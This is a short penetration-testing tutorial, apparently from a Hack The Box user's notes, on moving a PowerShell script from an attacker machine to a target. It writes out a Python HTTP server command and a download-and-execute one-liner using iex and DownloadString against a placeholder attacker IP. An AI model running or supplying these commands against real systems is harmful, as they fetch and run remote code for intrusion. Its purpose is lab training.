Attacker PowerShell File Transfer

This article describes a common technique used by attackers to transfer and execute a PowerShell script from a machine they control (the "attacker") to a target system.

  • The attacker serves a PowerShell (.ps1) file via HTTP from their machine;
  • The target makes an HTTP request to download this file and execute it in memory;

1. Serve the script via HTTP

The command used in the example starts a simple HTTP server on the chosen port:

sudo python3 -m http.server <Attacker-PORT01>

2. On the target: download and execute in memory

On the target, a line is executed that downloads the contents of the remote file and immediately executes it in the PowerShell process:

"powershell iex(New-Object Net.WebClient).DownloadString('http://<Attacker-IP>:<Attacker-PORT01>/<powershell-file>.ps1')"

2.1. If you just want to download the file

On the target, execute a line that downloads the contents of the remote file in the PowerShell process:

"powershell Invoke-WebRequest https://<Attacker-IP>:<Attacker-PORT01>/<powershell-file>.ps1 -OutFile <powershell-file>.ps1"

Tags

powershell-transfer

Notes

Some of this writeup is revised by AI. My own writing can be a bit clunky, so I get it to review certain parts to make things flow better and be a bit easier to read.

If you liked this content, please give me a respect on my Hack The Box profile. I'd be happy to hear I've helped you.

If anything here isn't clear, check out the cookbook. If you can't find the answer or need further clarification, please contact me at my e-mail.

Last updated: 2025-10-03